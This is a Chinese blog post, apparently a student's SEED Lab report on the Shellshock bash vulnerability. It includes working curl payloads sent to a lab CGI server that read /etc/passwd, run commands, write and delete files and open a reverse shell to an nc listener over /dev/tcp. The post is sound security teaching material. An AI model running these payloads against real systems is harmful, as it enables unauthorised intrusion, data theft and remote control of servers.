Shellshock

已于 2022-07-28 08:31:56 修改
阅读量1k 收藏
点赞数
分类专栏: SEED_LAB实验报告 文章标签: bash linux 安全
于 2022-07-28 08:30:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46241655/article/details/126020680
版权

准备

安装VisualBox
用提供的vdi文件点击下载,在VisualBox中创建虚拟机
实验要求PDF
下载实验文件
User ID: seed, Password: dees
User ID: root, Password: seedubuntu
在实验文件夹路径下执行下面命令,耐心等待,启动被攻击的网页程序
执行失败,需要重复执行尝试

docker-compose build # Build the container image

docker-compose up # Start the container

如果想关闭程序,在实验文件夹路径下执行下面命令

docker-compose down # Shut down the container

实验任务

任务1

攻击有漏洞的bash_shellshock,用同样的方法测试正常bash

任务2

修改环境变量

Task2.A:使用brower
打开插件 HTTP Header Live

访问http://www.seedlab-shellshock.com/cgi-bin/getenv.cgi
点击这个HTTP包
修改如下

点击Send,观察浏览器页面

出现大量A的环境变量是可攻击的

Task2.B:使用curl
-A:修改User-Agent
-e:修改referer
-H:自定义
-A和-e可以进行数据注入

任务3

进行Shellshock攻击
Task3.A:

curl -A "() { echo hello;}; echo Content_type: text/plain;echo; /bin/cat /etc/passwd" -v http://www.seedlab-shellshock.com/cgi-bin/getenv.cgi

Task3.B:

curl -H "aaa: () { echo hello;}; echo Content_type: text/plain;echo;/bin/id" -v http://www.seedlab-shellshock.com/cgi-bin/getenv.cgi


Task3.C:

curl -e "() { echo hello;}; echo Content_type: text/plain;echo; echo 11>/tmp/e.txt" -v http://www.seedlab-shellshock.com/cgi-bin/getenv.cgi

Task3.D:

curl -A "() { echo hello;}; echo Content_type: text/plain;echo;rm${IFS}/tmp/e.txt" -v http://www.seedlab-shellshock.com/cgi-bin/getenv.cgi


Question 1
不能,没root权限
Question 2
不能,payload经过url编码也不行

任务4

执行下面命令找自己的ip

ip addr


执行下面命令找服务器ip

dockps


攻击者用nc监听9090端口

nc -lvp 9090

开始攻击

curl -A "() { echo hello;}; echo Content_type: text/plain; echo;/bin/bash -i > /dev/tcp/10.9.0.1/9090 0<&1 2>&1" http://10.9.0.80/cgi-bin/vul.cgi


攻击成功

任务5

让CGI使用有补丁的shell
在服务器里面下载vim
然后修改成下面这个样子

vim /usr/lib/cgi-bin/vul.cgi


攻击失败

专注pwn0年
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SEED实验系列:ShellShock 攻击实验
weixin_33897722的博客
04-21 660
2019独角兽企业重金招聘Python工程师标准>>> ...
LAB 2 Shellshock Attack
qq_39411845的博客
07-18 365
Shellshock Attack利用Shellshock攻击Set-UID程序Web服务器调用CGI程序Task 1: Experimenting with Bash FunctionTask 2: Setting up CGI programsTask 3: Passing Data to Bash via Environment VariableTask 4: Launching the Shellshock AttackTask 5: Getting a Reverse Shell via Shel
shellshock-Attack-Lab
qq_49005782的博客
11-07 4017
shellshock Attack Lab 实验概述 实验背景 2014 年 9 月 24 日,发现了 Bash 中的一个严重漏洞 Shellshock,这个漏洞可以用于许多系统,可以远程启动,也可以从本地机器启动。在这个实验中,学生们需要研究这种攻击,这样才能了解Shellshock 的脆弱性. 此次实验包括以下四个内容: Shellshock Environment variables Function definition in bash Apache and CGI programs 实验
【信息安全-科软课程】Lab3 Shellshock Attack
weixin_41950078的博客
04-13 688
1.0 前言 2014年9月24日,发现了Bash的一个严重漏洞。昵称为Shellshock的这个漏洞可以利用许多系统,并从远程或本地机器上启动。在这个实验室里,学生们需要研究这种攻击,这样他们就能了解Shellshock的弱点。这个实验的学习目标是让学生对这种有趣的攻击有第一手的经验,了解它是如何运作的,并思考我们能从这种攻击中学到什么。该实验室的第一个版本是在2014年9月29日开发的,也就是袭击被报道的五天之后。这是2014年9月30日在我们计算机安全课上分配给学生的。SEED项目的一个重要任务是迅
shellshock
12-10
shellshock代码,网页形式,看起来不错,需要到可以试试哦。
shellshocker:ShellShock Live游戏的程序,用于计算击中敌人所需的角度和强度
05-12
Shellshocker是一款基于C++开发的游戏程序,名为"ShellShock Live",它涉及到计算机编程、游戏开发和物理学的结合。这款游戏的核心玩法是计算并发射炮弹以击中敌人,这需要玩家理解角度和力度的概念,这在物理中是...
shellshock补丁
10-20
破壳漏洞(shellshock)红帽4 X86(32位)补丁 内含: bash-3.0-27.0.3.el4.i386.rpm bash-debuginfo-3.0-27.el4.4.i386.rpm ------------------------------------------- 验证命令: env x='() { :;}; echo vulnerable'...
shellshockcgitool:CGI脚本Shellshock开发工具
03-08
CGI脚本ShellShock开发工具。 什么是ShellshockShellshock是Bash版本1.0.3-4.3中的关键错误,可以使攻击者执行任意命令。 Bash的漏洞版本错误地执行了遵循存储在环境变量中的函数定义的命令-攻击者可以在将用户...
Lab-03--Shellshock.zip
12-22
Shellshock漏洞详解及其在Linux环境下的防范》 Shellshock漏洞,全名是BASH(Bourne Again SHell)漏洞,是2014年9月被发现的一个严重安全漏洞,影响了广泛使用的Unix/Linux操作系统及基于这些系统的服务器、路由器...
【靶场补充】项目十二补充(shellshock原理)
人间体佐菲的博客
09-12 673
shellshock
shellshock学习
公众号shadow sock7
03-15 1145
参考:https://pentesterlab.com/exercises/cve-2014-6271/course绑定shell在本机上操作。为了得到一个交互式shell,先在vulnerable(192.168.170.250)上用nc将/bin/sh绑定(bind)到本地9999端口。echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: (
Linux 《ShellShock 攻击实验》实验报告
Yohann丶blog
08-02 202
image.png 介绍 wiki: Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开。许多互联网守护进程,如网页服务器,使用bash来处理某些命令,从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统。 环境搭建 下载 $ sudo su $ wg...
红队打靶:pWnOS1.0打靶思路详解之ssh私钥破解+shellshock漏洞提权
Bossfrank的博客
07-01 1198
本文详述了vulnhub靶机pWnOS1.0的详细打靶的第二种方法。打靶过程涉及到关于webmin任意文件泄露、ssh私钥碰撞、shellshock漏洞提权等。自己动手才发现问题很多,这个靶机的知识点还是很丰富。
学习笔记 | Shellshock漏洞利用提权
m0_57133419的博客
08-10 368
Shellshock漏洞中,攻击者可以通过在环境变量中插入恶意代码,例如函数定义,然后触发Bash解释器执行这些代码。这是因为Bash解释器在解释环境变量时,并不仅仅是将变量的值替换为文本,而是会尝试解释其中的特殊字符和命令。Bash解释器在解释环境变量时,不仅仅是简单地替换变量的值,它还会对变量的内容进行解释,包括其中可能存在的特殊字符和命令。然后,如果有任何触发条件,比如执行后面的命令时,Bash会执行这个恶意函数,并输出语句。借助漏洞利用的脚本直接更改脚本内容,发现不行,我不会改perl语言。
黑客必备!Linux Shell Shock漏洞利用和实战
最新发布
logic1001的博客
04-15 1115
漏洞介绍Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开。许多互联网守护进程,如网页服务器,使用bash来处理某些命令,从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统。——摘自维基百科环境搭建1、 以root权限安装4.1版本的bansh。下载地址:3、链接5、 如果上一步输出vulnerable,那么让/bin/sh指向/bin/bash。
linux shellshock漏洞,shellshock漏洞分析
weixin_28706923的博客
05-18 307
这是tr0ll2靶机涉及到的东西,先看一下在这个靶机上的过程。我们获取了noob用户的ssh密钥,之后登录却失败了:之后我们输入如下命令:ssh noob@192.168.16.141 -i noob -t '() { :;}; /bin/bash'再次登录,居然成功了:以上就是shellshock攻击,其利用的是bash在导入环境变量函数时候的漏洞,启动bash的时候,它不仅会导入这个函数,也...
Vulhub-Shellshock Remote Command Injection (CVE-2014-6271)
ad12456的博客
05-18 454
Shellshock远程命令注入
Bash Shellshock(Bash远程代码执行)漏洞分析及利用思路
热门推荐
Exploit的小站~
05-10 3万+
 今日爆出一个Bash的RCE漏洞,威力巨大。看了看老外的分析,觉得有必要写一写自己对这个漏洞的理解。 首先,问题起因于一个命令ENV。 原型: env [OPTION]... [NAME=VALUE]... [COMMAND [ARGS]...] Man是这么说的: Display, set, or remove environment variables,Run a comm...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值